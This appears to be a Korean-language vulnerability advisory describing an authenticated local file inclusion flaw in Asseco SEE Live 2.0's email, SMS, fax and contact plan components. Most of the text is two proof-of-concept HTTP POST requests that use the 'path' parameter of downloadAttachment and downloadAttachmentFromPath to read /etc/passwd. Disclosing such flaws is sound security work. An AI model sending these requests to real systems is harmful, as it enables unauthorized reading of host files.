
Asseco SEE Live 2.0의 Contact Plan, 이메일, SMS 및 팩스 구성 요소의 로컬 파일 포함 취약점을 통해 원격 인증 사용자가 downloadAttachment 및 downloadAttachmentFromPath API 호출의 `path` 매개변수를 사용하여 호스트의 파일에 접근할 수 있습니다.
Asseco SEE Live 2.0의 Contact Plan, E-Mail, SMS 및 Fax 구성 요소에서 발생하는 로컬 파일 포함 취약점으로, 인증된 원격 사용자가 downloadAttachment 및 downloadAttachmentFromPath API 호출의 "path" 매개변수를 통해 호스트의 파일에 접근할 수 있습니다.
HTTP 요청에는 낮은 수준의 인증이 필요합니다.
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"
HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"
Email.downloadAttachment
------WebKitFormBoundary
Content-Disposition: form-data; name="id"
[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="path"
/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"
[REDACTED]
------WebKitFormBoundary--
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"
HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"
Email.downloadAttachmentFromPath
------WebKitFormBoundary
Content-Disposition: form-data; name="path"
/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"
[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="model"
Template
------WebKitFormBoundary--